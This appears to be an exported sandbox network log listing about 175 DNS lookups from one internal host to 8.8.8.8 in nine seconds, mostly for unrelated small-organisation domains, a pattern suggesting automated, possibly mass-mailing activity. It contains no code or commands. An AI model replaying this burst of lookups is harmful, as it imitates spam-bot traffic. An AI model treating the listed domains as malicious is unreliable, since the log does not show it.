                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:01.120383024 CET192.168.2.68.8.8.80xab34Standard query (0)fr-dat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:01.766566038 CET192.168.2.68.8.8.80x6a78Standard query (0)chzko.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:01.796422005 CET192.168.2.68.8.8.80x44afStandard query (0)kustnara.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:01.904294968 CET192.168.2.68.8.8.80xad5aStandard query (0)pccj.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:01.980209112 CET192.168.2.68.8.8.80xb5e5Standard query (0)atis-sk.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:02.079967976 CET192.168.2.68.8.8.80x162cStandard query (0)multip.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:02.096327066 CET192.168.2.68.8.8.80x653Standard query (0)michiana.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:02.180989981 CET192.168.2.68.8.8.80xb270Standard query (0)kavram.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:02.226454973 CET192.168.2.68.8.8.80x50c7Standard query (0)cyclad.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:02.239377022 CET192.168.2.68.8.8.80x3770Standard query (0)aiolos-sa.grA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:02.245434046 CET192.168.2.68.8.8.80xe923Standard query (0)likangds.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:02.250031948 CET192.168.2.68.8.8.80xa75aStandard query (0)e-asset.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:02.341490984 CET192.168.2.68.8.8.80x8bb3Standard query (0)icd-host.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:02.349842072 CET192.168.2.68.8.8.80xc20fStandard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:02.440414906 CET192.168.2.68.8.8.80x7b67Standard query (0)midap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:02.451211929 CET192.168.2.68.8.8.80xe99eStandard query (0)rokoron.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:02.626727104 CET192.168.2.68.8.8.80x53abStandard query (0)acraloc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:02.627038002 CET192.168.2.68.8.8.80x8c10Standard query (0)aba.org.egA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:02.737797022 CET192.168.2.68.8.8.80x806fStandard query (0)dbnet.atA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:03.480731964 CET192.168.2.68.8.8.80x77a1Standard query (0)muhr-soehne.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:03.481097937 CET192.168.2.68.8.8.80x53eStandard query (0)nt-hat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:03.486823082 CET192.168.2.68.8.8.80x8bb3Standard query (0)icd-host.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:03.486910105 CET192.168.2.68.8.8.80xe99eStandard query (0)rokoron.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:03.486985922 CET192.168.2.68.8.8.80x7b67Standard query (0)midap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:03.501709938 CET192.168.2.68.8.8.80x2a54Standard query (0)biurohera.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:03.515032053 CET192.168.2.68.8.8.80x1c7dStandard query (0)apcotex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:03.584187984 CET192.168.2.68.8.8.80x62aeStandard query (0)adventist.roA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:03.586276054 CET192.168.2.68.8.8.80xdb5bStandard query (0)from30ty.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:04.086487055 CET192.168.2.68.8.8.80xc20fStandard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:04.322141886 CET192.168.2.68.8.8.80x1239Standard query (0)anduran.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:05.480799913 CET192.168.2.68.8.8.80x49d1Standard query (0)valselit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:05.493858099 CET192.168.2.68.8.8.80xdc9dStandard query (0)thiessen.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:05.496505022 CET192.168.2.68.8.8.80xd9f7Standard query (0)aiolos-sa.grA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:05.597258091 CET192.168.2.68.8.8.80x72daStandard query (0)karmy.com.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:05.601413965 CET192.168.2.68.8.8.80x56a9Standard query (0)linac.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:05.627995968 CET192.168.2.68.8.8.80x341cStandard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:05.754365921 CET192.168.2.68.8.8.80x9142Standard query (0)mackusick.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:05.861115932 CET192.168.2.68.8.8.80x6b45Standard query (0)gbmfg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:05.887968063 CET192.168.2.68.8.8.80x7e7aStandard query (0)uhsa.edu.agA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:05.889471054 CET192.168.2.68.8.8.80x278Standard query (0)cnti.krsn.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:05.889615059 CET192.168.2.68.8.8.80x51b8Standard query (0)bossinst.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:05.889751911 CET192.168.2.68.8.8.80xfcadStandard query (0)thiessen.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:05.906106949 CET192.168.2.6198.32.64.120x8dStandard query (0)deNS (Name server)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:05.939730883 CET192.168.2.68.8.8.80xde56Standard query (0)vfcindia.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:05.948610067 CET192.168.2.68.8.8.80x92daStandard query (0)vonparis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:05.994165897 CET192.168.2.68.8.8.80x2223Standard query (0)envogen.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:05.999924898 CET192.168.2.68.8.8.80xcc9dStandard query (0)webways.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:06.001691103 CET192.168.2.68.8.8.80x9fa4Standard query (0)atb-lit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:06.013644934 CET192.168.2.68.8.8.80x5d29Standard query (0)averwin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:06.015505075 CET192.168.2.68.8.8.80xd11aStandard query (0)portoccd.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:06.022197962 CET192.168.2.68.8.8.80xf44cStandard query (0)cnti.krsn.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:06.024425983 CET192.168.2.68.8.8.80xb4e6Standard query (0)gydrozo.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:06.039807081 CET192.168.2.68.8.8.80x5d42Standard query (0)isom.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:06.039972067 CET192.168.2.68.8.8.80x7de2Standard query (0)portoccd.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:06.075875044 CET192.168.2.68.8.8.80x5f63Standard query (0)grlawcc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:06.077187061 CET192.168.2.68.8.8.80xae8fStandard query (0)koz1.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:06.389856100 CET192.168.2.68.8.8.80xaa0bStandard query (0)s5w.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:06.435605049 CET192.168.2.68.8.8.80x3ba1Standard query (0)www.wkhk.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:06.566802979 CET192.168.2.68.8.8.80xdcb0Standard query (0)host.doA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:06.571803093 CET192.168.2.68.8.8.80xd03dStandard query (0)aiolos-sa.grA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:06.601464033 CET192.168.2.68.8.8.80xb07cStandard query (0)ktenergo.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:06.630537987 CET192.168.2.68.8.8.80xf10eStandard query (0)softizer.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:06.630606890 CET192.168.2.68.8.8.80x62d6Standard query (0)geecl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:06.632438898 CET192.168.2.68.8.8.80xf72Standard query (0)akdeniz.nlA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:06.632683039 CET192.168.2.68.8.8.80x48ecStandard query (0)vonparis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:06.632880926 CET192.168.2.68.8.8.80x4532Standard query (0)shanks.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:06.641196012 CET192.168.2.6198.32.64.120x21Standard query (0)comNS (Name server)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:06.642273903 CET192.168.2.68.8.8.80x1cc7Standard query (0)mkm-gr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:06.653059006 CET192.168.2.68.8.8.80xc5bdStandard query (0)koz1.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:06.719543934 CET192.168.2.68.8.8.80x7b93Standard query (0)grlawcc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:06.819633961 CET192.168.2.68.8.8.80x289Standard query (0)koz1.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:07.019712925 CET192.168.2.68.8.8.80xb8e2Standard query (0)tbvlugus.nlA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:07.020488977 CET192.168.2.68.8.8.80x39edStandard query (0)ftchat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:07.020945072 CET192.168.2.68.8.8.80x46faStandard query (0)rappich.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:07.021653891 CET192.168.2.68.8.8.80xb067Standard query (0)vivastay.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:07.043423891 CET192.168.2.68.8.8.80x1a73Standard query (0)hes.ptA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:07.043968916 CET192.168.2.68.8.8.80x84beStandard query (0)johnlyon.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:07.054846048 CET192.168.2.68.8.8.80x8d0cStandard query (0)mcseurope.nlA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:07.057693005 CET192.168.2.68.8.8.80x6477Standard query (0)aba.org.egA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:07.057749987 CET192.168.2.68.8.8.80x397Standard query (0)chzko.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:07.058036089 CET192.168.2.68.8.8.80xcb4Standard query (0)paraski.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:07.156053066 CET192.168.2.68.8.8.80x3a38Standard query (0)lyto.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:07.312273979 CET192.168.2.68.8.8.80x7504Standard query (0)chzko.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:07.324601889 CET192.168.2.68.8.8.80x8f3Standard query (0)ftchat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:07.377811909 CET192.168.2.68.8.8.80x7c44Standard query (0)chzko.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:07.384907007 CET192.168.2.68.8.8.80x9709Standard query (0)esmoke.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:07.397847891 CET192.168.2.68.8.8.80x171cStandard query (0)juso-gr.chA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:07.410041094 CET192.168.2.68.8.8.80x87fcStandard query (0)pro-fa.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:07.432686090 CET192.168.2.68.8.8.80x7584Standard query (0)ftchat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:07.439532042 CET192.168.2.68.8.8.80xb84fStandard query (0)juso-gr.chA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:07.439877987 CET192.168.2.68.8.8.80x597aStandard query (0)jnf.atA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:07.447185040 CET192.168.2.68.8.8.80xe4feStandard query (0)kallman.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:07.463464022 CET192.168.2.68.8.8.80xa6d8Standard query (0)averwin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:07.468328953 CET192.168.2.68.8.8.80x2e2bStandard query (0)nolaoig.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:07.468395948 CET192.168.2.68.8.8.80xb175Standard query (0)grlawcc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:07.472112894 CET192.168.2.68.8.8.80x4379Standard query (0)flamingorecordings.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:07.473371983 CET192.168.2.68.8.8.80xb3aaStandard query (0)uhsa.edu.agA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:07.478590012 CET192.168.2.68.8.8.80x42a6Standard query (0)scintel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:07.479135990 CET192.168.2.68.8.8.80xb9c1Standard query (0)burstner.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:07.493858099 CET192.168.2.68.8.8.80xd0c8Standard query (0)sokuwan.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:07.498461962 CET192.168.2.68.8.8.80x4b4fStandard query (0)onzcda.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:07.510420084 CET192.168.2.68.8.8.80xe648Standard query (0)gphpedit.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:07.581934929 CET192.168.2.68.8.8.80x66afStandard query (0)cbras.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:07.604285002 CET192.168.2.68.8.8.80x8b0dStandard query (0)lpver.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:07.605927944 CET192.168.2.68.8.8.80xd64dStandard query (0)pertex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:07.619184971 CET192.168.2.68.8.8.80x6b03Standard query (0)likangds.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:07.652626038 CET192.168.2.68.8.8.80x515dStandard query (0)rtcasey.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:07.667327881 CET192.168.2.68.8.8.80xfde9Standard query (0)nblewis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:07.668313980 CET192.168.2.68.8.8.80xb07cStandard query (0)ktenergo.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:07.705724955 CET192.168.2.68.8.8.80xebcaStandard query (0)pro-fa.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:07.713263988 CET192.168.2.68.8.8.80x9635Standard query (0)pertex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:07.717238903 CET192.168.2.68.8.8.80x83b6Standard query (0)vfcindia.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:07.717238903 CET192.168.2.68.8.8.80xdf2eStandard query (0)106west.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:07.762001038 CET192.168.2.68.8.8.80x4ac1Standard query (0)pro-fa.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:07.787758112 CET192.168.2.68.8.8.80x5c91Standard query (0)cubodown.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:07.792229891 CET192.168.2.68.8.8.80x2035Standard query (0)bidroll.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:07.923655987 CET192.168.2.68.8.8.80xedc5Standard query (0)cbaben.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:07.941636086 CET192.168.2.68.8.8.80x3064Standard query (0)nettlinx.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:07.943789959 CET192.168.2.68.8.8.80x809Standard query (0)78san.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:07.996332884 CET192.168.2.68.8.8.80x5764Standard query (0)nettle.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:08.008462906 CET192.168.2.68.8.8.80x8ee8Standard query (0)linac.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:08.028132915 CET192.168.2.68.8.8.80xdd54Standard query (0)vonparis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:08.028919935 CET192.168.2.68.8.8.80x2cefStandard query (0)umcor.amA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:08.029869080 CET192.168.2.68.8.8.80x55adStandard query (0)kumaden.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:08.064027071 CET192.168.2.68.8.8.80x6cd2Standard query (0)anteph.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:08.133590937 CET192.168.2.68.8.8.80xe378Standard query (0)stopllc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:08.134064913 CET192.168.2.68.8.8.80x339aStandard query (0)yasuma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:08.221338034 CET192.168.2.68.8.8.80x6c98Standard query (0)smitko.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:08.236133099 CET192.168.2.68.8.8.80x5314Standard query (0)t-trust.jpA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:08.241556883 CET192.168.2.68.8.8.80xe092Standard query (0)pro-fa.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:08.315002918 CET192.168.2.68.8.8.80x576aStandard query (0)ktenergo.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:08.370311975 CET192.168.2.68.8.8.80x7f3cStandard query (0)ktenergo.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:08.372437000 CET192.168.2.68.8.8.80x22c8Standard query (0)calvinly.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:08.385617971 CET192.168.2.68.8.8.80x6295Standard query (0)bggs.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:08.596303940 CET192.168.2.68.8.8.80x4a8Standard query (0)cvswl.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:08.629831076 CET192.168.2.68.8.8.80xce5cStandard query (0)gphpedit.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:08.633064032 CET192.168.2.68.8.8.80xa382Standard query (0)dspears.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:08.655227900 CET192.168.2.68.8.8.80x9e07Standard query (0)enguita.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:08.657546043 CET192.168.2.68.8.8.80xc60bStandard query (0)wvs-net.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:08.762449980 CET192.168.2.68.8.8.80x9164Standard query (0)ramkome.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:08.770596027 CET192.168.2.68.8.8.80xbb50Standard query (0)dspears.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:08.772361994 CET192.168.2.68.8.8.80xb541Standard query (0)kewlmail.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:08.774991035 CET192.168.2.68.8.8.80xe2e4Standard query (0)paraski.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:08.800411940 CET192.168.2.68.8.8.80xd303Standard query (0)mondopp.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:08.828068972 CET192.168.2.68.8.8.80x1f73Standard query (0)unicus.jpA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:09.121644020 CET192.168.2.68.8.8.80xe51bStandard query (0)amele.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:09.184711933 CET192.168.2.68.8.8.80xb432Standard query (0)apcotex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:09.227653027 CET192.168.2.68.8.8.80x7401Standard query (0)jabian.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:09.266712904 CET192.168.2.68.8.8.80x80cfStandard query (0)samtv.roA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:09.284955025 CET192.168.2.68.8.8.80xea3dStandard query (0)infotech.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:09.296842098 CET192.168.2.68.8.8.80xea8Standard query (0)awfraser.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:09.315210104 CET192.168.2.68.8.8.80xb2a4Standard query (0)mjrcpas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:09.333630085 CET192.168.2.68.8.8.80x7873Standard query (0)www.jacomfg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:09.468847036 CET192.168.2.68.8.8.80x5345Standard query (0)gphpedit.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:09.531900883 CET192.168.2.68.8.8.80x2eb3Standard query (0)roewer.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:09.535159111 CET192.168.2.68.8.8.80x5426Standard query (0)bible.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:09.537430048 CET192.168.2.68.8.8.80x134aStandard query (0)chzko.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:09.557049036 CET192.168.2.68.8.8.80xc711Standard query (0)yoruksut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:09.655850887 CET192.168.2.68.8.8.80xed37Standard query (0)awfraser.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:09.696537018 CET192.168.2.68.8.8.80xab8aStandard query (0)amerifor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:09.722656012 CET192.168.2.68.8.8.80xde2fStandard query (0)chzko.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:09.728509903 CET192.168.2.68.8.8.80xbc2cStandard query (0)com-edit.frA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:09.794867992 CET192.168.2.68.8.8.80xb320Standard query (0)iranytu.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:09.798892021 CET192.168.2.68.8.8.80x343eStandard query (0)samtv.roA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:09.899285078 CET192.168.2.68.8.8.80x9b2dStandard query (0)refintl.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:09.920488119 CET192.168.2.68.8.8.80x3704Standard query (0)awfraser.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:09.937880039 CET192.168.2.68.8.8.80xb65cStandard query (0)x96.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:09.943356037 CET192.168.2.68.8.8.80xfdd4Standard query (0)chzko.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:09.997617960 CET192.168.2.68.8.8.80xe63cStandard query (0)willsub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:09.999833107 CET192.168.2.68.8.8.80x9eadStandard query (0)any-s.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:10.000508070 CET192.168.2.68.8.8.80x11c4Standard query (0)ikulani.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:10.009681940 CET192.168.2.68.8.8.80x80dbStandard query (0)orbitgas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:10.098969936 CET192.168.2.68.8.8.80x33d2Standard query (0)pro-fa.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:10.099041939 CET192.168.2.68.8.8.80x5410Standard query (0)top1oil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:10.242795944 CET192.168.2.68.8.8.80xe51bStandard query (0)amele.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:10.370474100 CET192.168.2.68.8.8.80x7216Standard query (0)kamptal.atA (IP address)IN (0x0001)false
